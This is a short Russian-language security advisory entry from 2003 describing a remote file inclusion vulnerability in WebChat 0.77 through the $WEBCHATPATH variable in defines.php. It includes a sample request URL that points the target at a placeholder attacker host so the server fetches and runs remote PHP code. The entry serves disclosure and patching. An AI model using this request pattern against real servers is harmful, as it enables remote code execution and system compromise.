| Дата публикации: | 05.03.2003 |
| Всего просмотров: | 1447 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | WebChat 0.7x |
| Описание: | Уязвимость включения файла обнаружена в WebChat. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевом сервере. Сценарий 'defines.php' включает файлы 'db_mysql.php' и 'language/eng lish.php' через переменную $WEBCHATPATH, но не проверяет правильность местоположения файла перед его включением. Удаленный пользователь может определить удаленное местоположение этих файлов, заставляя целевой сервер включить и выполнить дистанционно расположенные файлы. Пример: http://[target]/defines.php?WEBCHATPATH=http://[attacker]/ где http://[attacker]/language/english.php или http://[attacker]/language/db_mysql.phpУязвимость обнаружена в WebChat 0.77 |
| Ссылки: | WebChat |